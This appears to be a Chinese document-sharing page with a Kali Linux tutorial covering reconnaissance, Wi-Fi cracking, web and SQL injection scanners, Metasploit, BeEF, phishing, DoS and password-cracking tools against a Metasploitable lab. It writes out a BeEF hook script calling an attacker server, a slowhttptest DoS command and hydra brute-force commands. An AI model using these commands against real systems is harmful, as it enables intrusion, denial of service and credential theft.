Kali Linux 最详细教程和分析_第1页
Kali Linux 最详细教程和分析_第2页
Kali Linux 最详细教程和分析_第3页
Kali Linux 最详细教程和分析_第4页
Kali Linux 最详细教程和分析_第5页
已阅读5页,还剩125页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

安装与配置信息收集工具漏洞分析工具KaliLinux-无线攻击网站渗透测试KaliLinux-开发工具KaliLinux-取证工具KaliLinux——社会工程学KaliLinux-压力工具KaliLinux-嗅探和欺骗KaliLinux-密码破解工具KaliLinux-维护访问KaliLinux-逆向工程KaliLinux-报告工具1、KaliLinux-安装和配置KaliLinux是道德黑客最好的安全包之一,包含一组按类别划分的工具。它是一个开源的,其官方网页是。通常,KaliLinux可以作为操作系统安装在机器中,作为我们将在下一节讨论的虚拟机。安装KaliLinux是一个实用的选择,因为它提供了更多的工作和组合工具的选项。您还可以创建实时启动CD或USB。所有这些都可以在以下链接中找到:/downloads/BackTrack是KaliLinux发行版的旧版本。最新版本是Kali2016.1,更新非常频繁。安装KaliLinux-首先,我们将下载VirtualBox并安装它。稍后,我们将下载并安装KaliLinux发行版。下载并安装虚拟盒子当你想在KaliLinux上测试你不确定的东西时,VirtualBox特别有用。当您想尝试未知包或测试代码时,在VirtualBox上运行KaliLinux是安全的。在VirtualBox的帮助下,您可以将KaliLinux安装在您的系统上(而不是直接安装在您的硬盘上)以及您的主要操作系统,可以是MAC或Windows或其他Linux版本。让我们了解如何在您的系统上下载和安装VirtualBox。第1步-要下载,请转到/wiki/Downloads。根据您的操作系统,选择正确的包。在这种情况下,它将是Windows的第一个,如以下屏幕截图所示。第2步-单击下一步。第3步-下一页将为您提供选择要安装应用程序的位置的选项。在这种情况下,让我们将其保留为默认值并单击下一步。第4步-单击下一步,弹出以下自定义安装屏幕截图。选择您要安装的功能并单击下一步。第5步-单击是继续安装。第6步-准备安装屏幕弹出。单击安装。第7步-单击完成按钮。VirtualBox应用程序现在将打开,如以下屏幕截图所示。现在我们准备安装本手册的其余主机,这也推荐用于专业用途。安装KaliLinux现在我们已经成功安装了VirtualBox,让我们继续下一步并安装KaliLinux。第1步-从其官方网站下载KaliLinux软件包:/downloads/第2步-单击VirtualBox→新建,如以下屏幕截图所示。第3步-选择正确的虚拟硬盘文件并单击打开。第4步-弹出以下屏幕截图。单击创建按钮。第5步-启动KaliOS。默认用户名是root,密码是toor。更新Kali不断将KaliLinux及其工具更新到新版本以保持功能非常重要。以下是更新Kali的步骤。第1步-转到应用程序→终端。然后,键入“apt-getupdate”,更新将如以下屏幕截图所示进行。第2步-现在升级工具,输入“apt-getupgrade”,新的软件包将被下载。第3步-它会询问您是否要继续。输入“Y”和“Enter”。第4步-要升级到较新版本的操作系统,请键入“apt-getdistupgrade”。实验室设置本节我们将架设另一台测试机,借助KaliLinux的工具进行测试。第1步-下载Metasploitable,这是一台Linux机器。可以从Rapid7官网下载:/metasploitabledownload.html?LS=1631875&CS=web第2步-通过提供您的详细信息进行注册。填写完上面的表格后,我们就可以下载软件了。第3步-单击VirtualBox→新建。第4步-单击“使用现有的虚拟硬盘文件”。浏览您下载Metasploitable的文件,然后单击打开。第5步-弹出创建虚拟机的屏幕。单击“创建”。默认用户名是msfadmin,密码是msfadmin。2、KaliLinux-信息收集工具在本章中,我们将讨论KaliLinux的信息收集工具。NMAP和ZenMAPNMAP和ZenMAP是KaliLinux中道德黑客扫描阶段的有用工具。NMAP和ZenMAP实际上是相同的工具,但是NMAP使用命令行而ZenMAP有GUI。NMAP是用于网络发现和安全审计的免费实用工具。许多系统和网络管理员还发现它对于网络清单、管理服务升级计划以及监控主机或服务正常运行时间等任务很有用。NMAP以新颖的方式使用原始IP数据包来确定网络上可用的主机、这些主机提供的服务(应用程序名称和版本)、它们运行的​​操作系统(和操作系统版本)、数据包过滤器/防火墙的类型正在使用等现在,让我们一步步学习如何使用NMAP和ZenMAP。第1步-要打开,请转到应用程序→01-信息收集→nmap或zenmap。第2步-下一步是检测目标主机的操作系统类型/版本。根据NMAP提示的帮助,操作系统类型/版本检测的参数是变量“-O”。有关更多信息,请使用此链接:/book/man-os-detection.html我们将使用的命令是-nmap-O01以下屏幕截图显示了您需要在何处键入上述命令以查看Nmap输出-第3步-接下来,打开TCP和UDP端口。要基于NMAP扫描所有TCP端口,请使用以下命令-nmap-p1-65535-T401其中参数“-p”表示所有需要扫描的TCP端口。在这种情况下,我们正在扫描所有端口,“-T4”是NMAP必须运行的扫描速度。以下是结果。绿色是所有TCP开放端口,红色是所有关闭端口。但是,由于列表太长,NMAP不显示。隐形扫描Stealthscan或SYN也称为half-openscan,因为它不完成TCP三向握手。黑客向目标发送SYN数据包;如果收到返回的SYN/ACK帧,则假定目标将完成连接并且端口正在侦听。如果从目标接收到RST,则假定该端口未激活或已关闭。现在要实际查看SYN扫描,请在NMAP中使用参数–sS。以下是完整命令-nmap-sS-T401以下屏幕截图显示了如何使用此命令-搜索漏洞Searchsploit是一种工具,可帮助KaliLinux用户使用命令行直接从Exploit数据库存档中进行搜索。要打开它,请转到应用程序→08-ExploitationTools→searchsploit,如以下屏幕截图所示。打开终端后,输入“

searchsploitexploitindexname

”。域名解析工具在本节中,我们将学习如何使用Kali内置的一些DNS工具。基本上,这些工具有助于区域传输或域IP解决问题。dnsenum.pl第一个工具是dnsenum.pl,它是一个PERL脚本,可帮助获取MX、A和其他记录连接到域。单击左侧面板上的终端。输入“dnsenumdomainname”,将显示所有记录。在本例中,它显示A记录。DNSMAP第二个工具是DNSMAP,它有助于查找我们正在搜索的与该域相关联的电话号码、联系人和其他子域。下面是一个例子。点击上一节的终端,然后输入“dnsmap域名”仪表盘第三个工具是dnstracer,它确定给定域名服务器(DNS)从何处获取给定主机名的信息。单击上一节中的终端,然后键入“dnstracer域名”。LBD工具LBD(负载平衡检测器)工具非常有趣,因为它们可以检测给定域是否使用DNS和/或HTTP负载平衡。这很重要,因为如果您有两台服务器,那么其中一台可能不会更新,您可以尝试利用它。以下是使用它的步骤-首先,单击左侧面板上的终端。然后,键入“lbd域名”。如果它产生的结果为“FOUND”,则意味着服务器具有负载平衡。在这种情况下,结果是“未找到”。平安3Hping3被道德黑客广泛使用。它与ping工具几乎相似,但更高级,因为它可以绕过防火墙过滤器并使用TCP、UDP、ICMP和RAW-IP协议。它具有跟踪路由模式和在覆盖通道之间发送文件的能力。单击左侧面板上的终端。键入“hping3–h”,它将显示如何使用此命令。另一个命令是“hping3域或IP参数”3、KaliLinux-漏洞分析工具在本章中,我们将学习如何使用一些工具来帮助我们利用设备或应用程序来获取访问权限。思科工具Kali有一些可用于利用Cisco路由器的工具。一种这样的工具是Cisco-torch,它用于大规模扫描、指纹识别和利用。让我们通过单击左窗格打开终端控制台。然后,输入“cisco-torch–parameterIPofhost”,如果没有发现任何可利用的东西,则会显示以下结果。要查看可以使用的参数是什么,请键入“cisco-torch?”思科审计工具它是一个PERL脚本,用于扫描Cisco路由器的常见漏洞。要使用它,请再次打开左窗格中的终端,如上一节所示,然后键入“CAT–h主机名或IP”。您可以添加端口参数“-p”,如以下屏幕截图所示,在本例中为23以对其进行暴力破解。思科全球开发者CiscoGlobalExploiter(CGE)是一种高级、简单且快速的安全测试工具。使用这些工具,您可以执行多种类型的攻击,如以下屏幕截图所示。但是,在实际环境中进行测试时要小心,因为其中一些可能会使Cisco设备崩溃。例如,选项可以停止服务。要使用此工具,请输入“cge.pl

IPaddress

numberofvulnerability”以下屏幕截图显示了针对上述列表中的第3号漏洞在Cisco路由器上执行的测试结果。结果显示漏洞被成功利用。床BED是一个程序,旨在检查守护进程是否存在潜在的缓冲区溢出、格式字符串等。阿尔。本例中,我们将测试IP为02、协议为HTTP的测试机。该命令将是“bed–sHTTP–t02”,测试将继续。4、KaliLinux-无线攻击在本章中,我们将学习如何使用KaliLinux内置的Wi-Fi破解工具。但是,重要的是您拥有的无线网卡支持监控模式。蕨类Wifi饼干FernWificracker是Kali破解无线必备的工具之一。在打开Fern之前,我们应该将无线网卡设置为监控模式。为此,请在终端中键入“airmon-ngstartwlan-0”。现在,打开FernWirelessCracker。第1步-应用程序→单击“无线攻击”→“FernWirelessCracker”。Step2

-选择无线网卡,如下图所示。第3步-单击“扫描访问点”。第4步-完成扫描后,它将显示找到的所有无线网络。在这种情况下,只找到“WPA网络”。第5步-单击WPA网络,如上图所示。它显示所有找到的无线。通常,在WPA网络中,它会执行字典攻击。第6步-单击“浏览”并找到用于攻击的词表。第7步-单击“Wifi攻击”。第8步-完成字典攻击后,它找到了密码,如下图所示。天命Kismet是一款WIFI网络分析工具。它是一个802.11第2层无线网络检测器、嗅探器和入侵检测系统。它适用于任何支持原始监控(rfmon)模式的无线网卡,并且可以嗅探802.11a/b/g/n流量。它通过收集数据包和隐藏网络来识别网络。要使用它,请将无线网卡设置为监控模式,然后在终端中输入“airmon-ngstartwlan-0”。让我们学习如何使用这个工具。第1步-要启动它,请打开终端并键入“kismet”。第2步-单击“确定”。第3步-当它要求启动Kismet服务器时单击“是”。否则它将停止运行。第4步-启动选项,保留默认值。单击“开始”。第5步-现在它会显示一个表格,要求您定义无线网卡。在这种情况下,单击是。第6步-在这种情况下,无线源是“wlan0”。它必须写在“Intf”部分→单击“添加”。第7步-它将开始嗅探wifi网络,如以下屏幕截图所示。第8步-单击任何网络,它会生成无线详细信息,如以下屏幕截图所示。地理信息系统GISKismet是一种无线可视化工具,以实用的方式表示使用Kismet收集的数据。GISKismet将信息存储在数据库中,因此我们可以使用SQL查询数据并生成图表。GISKismet目前使用SQLite作为数据库,使用GoogleEarth/KML文件进行绘图。让我们学习如何使用这个工具。第1步-要打开GISKismet,请转到:应用程序→单击“无线攻击”→giskismet。您还记得在上一节中,我们使用Kismet工具探索有关无线网络的数据以及Kismet将所有这些数据打包在netXML文件中。第2步-要将此文件导入Giskismet,键入“root@kali:~#giskismet-xKxml”,它将开始导入文件。导入后,我们可以将它们导入GoogleEarth我们之前找到的热点。第3步-假设我们已经安装了GoogleEarth,我们单击文件→打开Giskismet创建的文件→单击“打开”。将显示以下地图。幽灵网络钓鱼者GhostPhisher是一种流行的工具,可帮助创建伪造的无线接入点,然后再创建中间人攻击。第1步-要打开它,请单击“应用程序”→“无线攻击”→“幽灵网络钓鱼”。第2步-打开后,我们将使用以下详细信息设置假AP。无线接口输入:wlan0SSID:无线AP名称IP地址:AP将拥有的IPWAP:将使用此SSID进行连接的密码第3步-单击“开始”按钮。无线网它是另一种无线破解工具,可以连续攻击多个WEP、WPA、WPS加密网络。首先,无线网卡必须处于监控模式。第1步-打开它,转到应用程序→无线攻击→Wifite。第2步-键入“wifite–showb”以扫描网络。第3步-要开始攻击无线网络,请单击Ctrl+C。第4步-键入“1”以破解第一个无线。第5步-攻击完成后,将找到密钥。5、KaliLinux-网站渗透测试在本章中,我们将了解KaliLinux提供的网站渗透测试。织女星用法Vega是一个免费开源的扫描器和测试平台,用于测试Web应用程序的安全性。Vega可以帮助您查找和验证SQL注入、跨站点脚本(XSS)、无意中泄露的敏感信息和其他漏洞。它是用Java编写的,基于GUI,可在Linux、OSX和Windows上运行。Vega包括一个用于快速测试的自动扫描仪和一个用于战术检查的拦截代理。Vega可以使用网络语言中强大的API进行扩展:JavaScript。官方网页是/vega/第1步-打开Vega转到应用程序→03-Web应用程序分析→Vega第2步-如果您没有在路径中看到应用程序,请键入以下命令。第3步-要开始扫描,请单击“+”号。第4步-输入将被扫描的网页URL。在这种情况下,它是metasploitable机器→单击“下一步”。第5步-选中要控制的模块的所有框。然后,单击“下一步”。第6步-在以下屏幕截图中再次单击“下一步”。第7步-单击“完成”。第8步-如果弹出下表,请单击“是”。扫描将继续,如以下屏幕截图所示。第9步-扫描完成后,在左侧面板上,您可以看到根据严重程度分类的所有结果。如果单击它,您将在右侧面板上看到漏洞的所有详细信息,例如“请求”、“讨论”、“影响”和“修复”。Zap代理ZAP-OWASPZedAttackProxy是一种易于使用的集成渗透测试工具,用于查找Web应用程序中的漏洞。它是一个Java接口。第1步-要打开ZapProxy,请转到应用程序→03-Web应用程序分析→owaspzap。第2步-单击“接受”。ZAP将开始加载。第3步-从以下屏幕截图中选择一个选项,然后单击“开始”。以下网站可通过IP进行metasploitable:01第4步-在“URLtoattack”中输入测试网站的URL→单击“Attack”。扫描完成后,您将在左上面板看到所有已抓取的站点。在左侧面板“警报”中,您将看到所有发现以及描述。第5步-单击“蜘蛛”,您将看到所有扫描的链接。数据库工具使用sqlmapsqlmap是一种开源渗透测试工具,可自动执行检测和利用SQL注入漏洞以及接管数据库服务器的过程。它配备了强大的检测引擎、终极渗透测试器的许多利基功能以及范围广泛的开关,从数据库指纹识别、从数据库中获取数据,到访问底层文件系统和通过输出在操作系统上执行命令。带外连接。让我们学习如何使用sqlmap。第1步-要打开sqlmap,请转到应用程序→04-数据库评估→sqlmap。具有SQL注入易受攻击参数的网页是metasploitable。第2步-要开始sql注入测试,请键入“sqlmap–u受害者的URL”第3步-从结果中,您会看到某些变量是易受攻击的。忍者sqlninja是MicrosoftSQLServer上的SQL注入,可实现完整的GUI访问。sqlninja是一种旨在利用使用MicrosoftSQLServer作为其后端的Web应用程序上的SQL注入漏洞的工具。有关此工具的完整信息,请访问/第1步-要打开sqlninja,请转到应用程序→04-数据库评估→sqlninja。CMS扫描工具WPS扫描WPScan是一个黑盒WordPress漏洞扫描器,可用于扫描远程WordPress安装以查找安全问题。第1步-打开WPscan转到应用程序→03-Web应用程序分析→“wpscan”。弹出以下屏幕截图。第2步-要扫描网站的漏洞,请键入“wpscan–u网页的URL”。如果扫描仪未更新,它会要求您更新。我会建议这样做。扫描开始后,您将看到结果。在以下屏幕截图中,漏洞由红色箭头指示。扫一扫由于其灵活性,Joomla可能是目前使用最广泛的CMS。对于此CMS,它是一个Joomla扫描仪。它将帮助网络开发人员和网络管理员识别他们部署的Joomla站点上可能存在的安全漏洞。第1步-要打开它,只需单击终端的左侧面板,然后单击“joomscan–parameter”。第2步-获得有关使用类型“joomscan/?”的帮助第3步-要开始扫描,请键入“joomscan–u受害者的URL”。结果将如以下屏幕截图所示显示。SSL扫描工具TLSSLed是一个Linuxshell脚本,用于评估目标SSL/TLS(HTTPS)Web服务器实现的安全性。它基于sslscan,一个基于openssl库和“openssls_client”命令行工具的全面SSL/TLS扫描器。当前的测试包括检查目标是否支持SSLv2协议、NULL密码、基于密钥长度(40或56位)的弱密码、强密码(如AES)的可用性、数字证书是否经过MD5签名,以及当前的SSL/TLS重新协商能力。要开始测试,请打开终端并输入“tlssledURL端口”。它将开始测试证书以查找数据。从结果中可以看出,证书有效期至2018年,如以下屏幕截图中的绿色所示。w3afw3af是一个Web应用程序攻击和审计框架,旨在识别和利用所有Web应用程序漏洞。这个包为框架提供了一个图形用户界面(GUI)。如果您只需要命令行应用程序,请安装w3af-console。该框架被称为“web的metasploit”,但它实际上更多,因为它还使用黑盒扫描技术发现web应用程序漏洞。w3af核心及其插件完全用Python编写。该项目有130多个插件,可识别和利用SQL注入、跨站点脚本(XSS)、远程文件包含等。第1步-打开它,转到应用程序→03-Web应用程序分析→单击w3af。第2步-在“目标”上输入受害者的URL,在这种情况下将是metasploitable网址。第3步-选择配置文件→单击“开始”。第4步-转到“结果”,您可以看到包含详细信息的发现。6、KaliLinux-开发工具在本章中,我们将了解KaliLinux提供的各种漏洞利用工具。元漏洞正如我们之前提到的,Metasploit是Rapid7的产品,大部分资源都可以在他们的网页上找到。它有两个版本——商业版和免费版。这两个版本之间的差异并不大,因此在本例中我们将使用社区版本(免费)。作为一名道德黑客,您将使用嵌入了Metasploit社区版本的“KaliDitribution”,以及其他通过节省安装时间而非常舒适的道德黑客工具。但是,如果您想作为单独的工具安装,它是一个可以安装在Linux、Windows和OSX等操作系统中的应用程序。首先,在Kali中打开Metasploit控制台。然后,转到应用程序→开发工具→Metasploit。启动后,您将看到以下屏幕,其中Metasploit的版本以红色下划线标出。在控制台中,如果您使用帮助或?符号,它将向您显示一个列表,其中包含MSP命令及其描述。您可以根据您的需要和您将使用的内容进行选择。另一个重要的管理命令是msfupdate,它有助于使用最新的漏洞利用更新metasploit。在控制台中运行此命令后,您将需要等待几分钟,直到更新完成。它有一个名为“搜索”的好命令,您可以使用它来查找您想要的内容,如以下屏幕截图所示。例如,我想查找与微软相关的漏洞,命令可以是msf>searchname:Microsofttype:exploit。其中“search”是命令,“name”是我们要查找的对象的名称,“type”是我们要查找的脚本类型。另一个命令是“信息”。它提供有关使用模块或平台的信息、作者是谁、漏洞参考以及可能具有的负载限制。阿米蒂奇ArmitageGUIformetasploit是metasploit的补充工具。它可视化目标、推荐漏洞利用并公开高级的漏洞利用后功能。让我们打开它,但首先应该打开并启动metasploit控制台。要打开Armitage,请转至应用程序→漏洞利用工具→Armitage。单击“连接”按钮,如以下屏幕截图所示。当它打开时,您将看到以下屏幕。Armitage是用户友好的。“目标”区域列出了所有你发现的和你正在使用的机器,被黑的目标是红色的,上面有雷雨。破解目标后,您可以右键单击它并继续探索您需要做的事情,例如探索(浏览)文件夹。在以下GUI中,您将看到文件夹视图,称为控制台。只需单击文件夹,您就可以浏览文件夹,而无需metasploit命令。在GUI的右侧,是列出漏洞模块的部分。牛肉BeEF代表浏览器开发框架。它是一个专注于网络浏览器的渗透测试工具。BeEF允许专业渗透测试人员使用客户端攻击向量评估目标环境的实际安全态势。首先,您必须使用以下命令更新Kali包-root@kali:/#apt-getupdateroot@kali:/#apt-getinstallbeef-xss要开始,请使用以下命令-root@kali:/#cd/usr/share/beef-xssroot@kali:/#./beef打开浏览器,输入用户名和密码:beef。BeEF挂钩是托管在BeEF服务器上的JavaScript文件,需要在客户端浏览器上运行。当它这样做时,它会回调BeEF服务器,传达有关目标的大量信息。它还允许针对目标运行其他命令和模块。在此示例中,BeEF挂钩的位置为01:3000/hook.js。为了攻击浏览器,在客户端将要查看的页面中包含JavaScript挂钩。有多种方法可以做到这一点,但最简单的方法是将以下内容插入页面并以某种方式让客户端打开它。<scriptsrc="01:3000/hook.js"type="text/javascript"></script>页面加载后,返回BeEF控制面板并单击左上角的“在线浏览器”。几秒钟后,您应该会看到您的IP地址弹出窗口,代表一个挂钩的浏览器。将鼠标悬停在IP上将快速提供浏览器版本、操作系统以及安装了哪些插件等信息。要远程运行该命令,请单击“拥有”主机。然后,在命令上单击要执行的模块,最后单击“执行”。Linux漏洞利用建议器它建议在给定Linux操作系统的发行版本“uname-r”的情况下可能存在的漏洞。要运行它,请键入以下命令-root@kali:/usr/share/linux-exploit-suggester#./Linux_Exploit_Suggester.pl-k3.0.03.0.0是我们要利用的Linux操作系统的内核版本。7、KaliLinux-取证工具在本章中,我们将了解KaliLinux中可用的取证工具。p0fp0f是一种工具,即使相关设备位于数据包防火墙后面,它也可以通过检查捕获的数据包来识别目标主机的操作系统。P0f不会产生任何额外的网络流量,无论是直接的还是间接的;没有名称查找;没有神秘的探测器;没有ARIN查询;没有什么。在高级用户手中,P0f可以检测防火墙的存在、NAT的使用和负载平衡器的存在。在终端输入“p0f-h”,看看如何使用,你会得到如下结果。它甚至会列出可用的接口。然后,键入以下命令:“p0f–ieth0–p-o文件名”。其中参数“-i”为接口名称,如上所示。“-p”表示它处于混杂模式。“-o”表示输出将保存在文件中。打开地址为的网页从结果中可以看出,Web服务器使用的是apache2.x,操作系统是Debian。pdf解析器pdf-parser是一种解析PDF文档以识别所分析的pdf文件中使用的基本元素的工具。它不会呈现PDF文档。不建议将其用于PDF解析器的教科书案例,但它可以完成工作。通常,这用于您怀疑其中嵌入了脚本的pdf文件。命令是-pdf-parser-o10filepath其中“-o”是对象的数量。如您在以下屏幕截图中所见,pdf文件打开了一个CMD命令。矮胖子Dumpzilla应用程序是在Python3.x中开发的,目的是提取Firefox、Iceweasel和Seamonkey浏览器的所有取证有趣信息进行分析。救援它将数据从一个文件或块设备(硬盘、cdrom等)复制到另一个文件或块设备(硬盘、cdrom等),在读取错误的情况下首先尝试挽救好的部分。ddrescue的基本操作是全自动的。也就是说,您不必等待错误、停止程序、从新位置重新启动程序等。如果您使用ddrescue的mapfile功能,则可以非常有效地挽救数据(仅读取所需的块)。此外,您可以随时中断救援并稍后在同一时间恢复。映射文件是ddrescue有效性的重要组成部分。除非您知道自己在做什么,否则请使用它。命令行是-dd_rescueinfilepathoutfilepath参数“–v”表示冗长。“/dev/sdb”是要拯救的文件夹。img文件是恢复的图像。DFF它是另一种用于恢复文件的取证工具。它也有一个GUI。要打开它,请在终端中键入“dff-gui”,然后将打开以下WebGUI。单击文件→“打开证据”。将打开下表。选中“原始格式”并单击“+”以选择要恢复的文件夹。然后,您可以浏览窗格左侧的文件以查看已恢复的内容。8、KaliLinux——社会工程学在本章中,我们将了解KaliLinux中使用的社会工程工具。社会工程工具包使用Social

-EngineerToolkit

(SET)是一个开源渗透测试框架,专为社会工程而设计。SET有许多自定义攻击向量,可让您在短时间内做出可信的攻击。这些工具使用人类行为来诱骗他们进入攻击媒介。让我们学习如何使用社会工程师工具包。第1步-要打开SET,请转到应用程序→社会工程工具→单击“SET”社会工程工具。第2步-它会询问您是否同意使用条款。键入“y”,如以下屏幕截图所示。第3步-以下屏幕截图中显示的大多数菜单都是不言自明的,其中最重要的是数字1“社会工程攻击”。第4步-键入“1”

→输入。将打开一个子菜单。如果您再次按下Enter按钮,您将看到每个子菜单的说明。鱼叉式网络钓鱼模块允许您专门制作电子邮件消息,并将它们发送给您的目标受害者,并附上FileFormatmalicious负载。例如,发送恶意PDF文档,如果受害者打开该文档,就会危及系统。如果您想欺骗您的电子邮件地址,请确保安装了“Sendmail”(apt-getinstallsendmail)并将config/set_configSENDMAIL=OFF标志更改为SENDMAIL=ON。鱼叉式网络钓鱼攻击有两种选择-执行群发电子邮件攻击创建FileFormat负载和社会工程模板第一个是让SET为你做所有事情(选项1),第二个是创建你自己的FileFormat有效载荷并在你自己的攻击中使用它。输入“99”返回主菜单,然后输入“2”转到“Thewebattackvectors”。Web攻击模块是利用多种基于Web的攻击来危害目标受害者的独特方式。如果受害者单击链接,则通过对受害者执行网络钓鱼攻击来使用此模块。一旦他们点击一个链接,就会发生各种各样的攻击。输入“99”返回主菜单,然后输入“3”。感染性USB/CD/DVD模块将创建一个autorun.inf文件和一个Metasploit负载。负载和自动运行文件被刻录或复制到USB上。当DVD/USB/CD插入受害者的机器时,它会触发自动运行功能(如果启用了自动运行)并有可能危及系统。您可以选择要使用的攻击向量:文件格式错误或直接可执行文件。以下是传染性媒体生成器的选项。文件格式漏洞利用标准Metasploit可执行文件输入“99”返回主菜单。然后,键入“4”转到“Web攻击向量”。创建有效负载和侦听器是创建Metasploit有效负载的简单方法。它将为您导出exe文件并生成一个侦听器。您需要说服受害者下载exe文件并执行它以获取shell。输入“99”返回主菜单,然后输入“5”转到“Thewebattackvectors”。群发邮件攻击将允许您向受害者发送多封电子邮件并自定义消息。群发邮件程序有两个选项;第一种是向单个电子邮件地址发送电子邮件。第二个选项允许您导入一个包含所有收件人电子邮件的列表,它会将您的消息发送给该列表中任意数量的人。电子邮件攻击单个电子邮件地址电子邮件攻击群发邮件程序输入“99”返回主菜单,然后输入“9”进入“PowershellAttackVector”。Powershell攻击向量模块允许您创建特定于PowerShell的攻击。这些攻击允许您使用PowerShell,它在WindowsVista及更高版本的所有操作系统中默认可用。PowerShell为部署有效负载和执行不会被预防技术触发的功能提供了一个富有成效的环境。Powershell字母数字Shellcode注入器Powershell反向ShellPowershell绑定外壳Powershell转储SAM数据库9、KaliLinux-压力工具压力工具用于创建DoS攻击或为不同的应用程序创建压力测试,以便为将来采取适当的措施。所有压力测试工具都可以在应用程序→02-漏洞分析→压力测试中找到。所有压力测试测试都将在IP为02的metsploitable机器上完成慢速测试Slowhttptest是DoS攻击工具之一。它特别使用HTTP协议与服务器连接并保持CPU和RAM等资源繁忙。让我们详细看看如何使用它并解释它的功能。要打开slowhttptest,首先打开终端并输入“slowhttptest–parameters”。您可以键入“slowhttptest–h”来查看您需要使用的所有参数。如果您收到输出,“未找到命令”,您必须首先键入“apt-getinstallslowhttptest”。然后在安装之后,再次输入slowhttptest–h输入以下命令-slowhttptest-c500-H-g-ooutputfile-i10-r200-tGET–u02/index.php-x24-p2在哪里,(-c500)=500个连接(-H)

=Slowloris模式-g

=生成统计信息-ooutputfile

=输出文件名-i10

=使用10秒等待数据-r200

=200个连接与-tGET=GET请求-u02/index.php

=目标网址-x24

=最大长度为24字节-p2

=2秒超时测试开始后,输出将如以下屏幕截图所示,您可以在其中注意到该服务可用。一段时间后,在287连接处服务中断。这意味着服务器最多可以处理287个HTTP连接。邀请洪水Inviteflood是通过UDP/IP泛洪的SIP/SDPINVITE消息。它在各种Linux发行版上执行。它通过发送多个INVITE请求对SIP设备进行DoS(拒绝服务)攻击。要打开Inviteflood,首先打开终端并输入“inviteflood–parameters”如需帮助,您可以使用“inviteflood–h”接下来,您可以使用以下命令-invitefloodeth0target_extensiontarget_domaintarget_ipnumber_of_packets在哪里,target_extension是2000target_domain是192.168.xxtarget_ip是192.168.xxnumber_of_packets为1-a是SIP账号的别名洪水Iaxflood是一种VoIPDoS工具。要打开它,请在终端中键入“iaxfloodsourcenamedestinationnamenumpackets”。要知道如何使用,输入“iaxflood–h”thc-ssl-dosTHC-SSL-DOS是一个验证SSL性能的工具。建立安全的SSL连接需要在服务器上比在客户端上多15倍的处理能力。THCSSL-DOS通过使服务器过载并将其从Internet上关闭来利用此不对称属性。以下是命令-thc-ssl-dosvictimIPhttpsport–accept在这个例子中,它将是-thc-ssl-dos443–accept它的输出如下-10、KaliLinux-嗅探和欺骗嗅探工具的基本概念就像窃听一样简单,KaliLinux有一些用于此目的的流行工具。在本章中,我们将了解Kali中可用的嗅探和欺骗工具。打嗝套装Burpsuite可以用作浏览器和网络服务器之间的嗅探工具,以查找网络应用程序使用的参数。要打开Burpsuite,请转到应用程序→Web应用程序分析→burpsuite。为了设置嗅探,我们将burpsuite配置为充当代理。为此,请转到选项,如以下屏幕截图所示。如图所示选中该框。在这种情况下,代理IP将为,端口为8080。然后配置浏览器代理就是burpsuite机器的IP和端口。要开始拦截,请转到代理→拦截→单击“拦截已开启”。继续在要查找参数的网页上导航以进行漏洞测试。在这种情况下,它是IP为02的可元攻击机器转到“HTTP历史记录”。在下面的屏幕截图中,红色箭头标记的行显示了最后一个请求。在Raw中,SessionID等隐藏参数以及用户名和密码等其他参数已用红色下划线标出。中间代理mitmproxy是一个支持SSL的中间人HTTP代理。它提供了一个控制台界面,允许即时检查和编辑流量。要打开它,请转到终端并输入“mitmproxy-parameter”,要获得有关命令的帮助,请输入“mitmproxy–h”。要启动mitmproxy,请键入“mitmproxy–pportnumber”。在这种情况下,它是“mitmproxy–p80”。线鲨Wireshark是最好的数据包分析器之一。它深入分析帧级别的数据包。您可以从其官方网页获得有关Wireshark的更多信息:https

:///。在Kali中,可以使用以下路径找到它-Applications→Sniffing&Spoofing→wireshark。单击wireshark后,将打开以下GUI。点击“Start”开始抓包,如下图所示。sslstripsslstrip是一种MITM攻击,它迫使受害者的浏览器通过HTTP以纯文本形式进行通信,并且代理修改来自HTTPS服务器的内容。为此,sslstrip正在“剥离”https://URL并将它们转换为http://URL。要打开它,请转到应用程序→09-嗅探和欺骗→欺骗和MITM→sslstrip。要设置它,写入将所有80端口通信转发到8080。然后,为所需的端口启动sslstrip命令。11、KaliLinux-密码破解工具在本章中,我们将了解KaliLinux中使用的重要密码破解工具。九头蛇Hydra是一个登录破解器,支持多种协议攻击(CiscoAAA、Ciscoauth、Ciscoenable、CVS、FTP、HTTP(S)-FORM-GET、HTTP(S)-FORM-POST、HTTP(S)-GET、HTTP(S)-HEAD、HTTP-Proxy、ICQ、IMAP、IRC、LDAP、MS-SQL、MySQL、NNTP、OracleListener、OracleSID、PC-Anywhere、PC-NFS、POP3、PostgreSQL、RDP、Rexec、Rlogin、Rsh、SIP、SMB(NT)、SMTP、SMTP枚举、SNMPv1+v2+v3、SOCKS5、SSH(v1和v2)、SSHKEY、Subversion、Teamspeak(TS2)、Telnet、VMware-Auth、VNC和XMPP).要打开它,请转到应用程序→密码攻击→在线攻击→hydra。它将打开终端控制台,如以下屏幕截图所示。在这种情况下,我们将暴力破解具有IP01的metasploitable机器的FTP服务我们在Kali中创建了一个单词列表,扩展名为“lst”,路径为usr\share\wordlist\metasploit。命令如下-hydra-l/usr/share/wordlists/metasploit/user-P/usr/share/wordlists/metasploit/passwords01–V其中-V是尝试时的用户名和密码如下截图所示,找到用户名和密码为msfadmin:msfadmin约翰尼Johnny是JohntheRipper密码破解工具的GUI。一般用于弱口令。要打开它,请转到应用程序→密码攻击→johnny。在这种情况下,我们将使用以下命令获取Kali机器的密码,并在桌面上创建一个文件。单击“打开密码文件”→确定,所有文件将显示如下图所示。点击“开始攻击”。攻击完成后,点击左侧面板中的“密码”,密码将被取消。约翰john是JohnnyGUI的命令行版本。要启动它,请打开终端并输入“john”。在取消隐藏密码的情况下,我们需要编写以下命令-root@kali:~#unshadowpasswdshadow>unshadowed.txt彩虹裂纹RainbowCrack软件通过彩虹表查找来破解哈希。彩虹表是存储在硬盘上的普通文件。Rainbowtables一般都是在网上买的,或者可以用不同的工具自己编译。要打开它,请转到应用程序→密码攻击→单击“rainbowcrack”。破解哈希密码的命令是-rcrackpath_to_rainbow_tables-fpath_to_password_hashSQLdict它是一个针对SQLServer的字典攻击工具,使用起来非常简单和基础。要打开它,请打开终端并输入“sqldict”。它将打开以下视图。在“目标IP服务器”下,输入保存SQL的服务器的IP。在“目标帐户”下,输入用户名。然后使用密码加载文件并单击“开始”直到完成。哈希标识符它是一种用于识别哈希类型的工具,即它们的用途。例如,如果我有一个HASH,它可以告诉我它是Linux还是windowsHASH。上面的屏幕显示它可以是一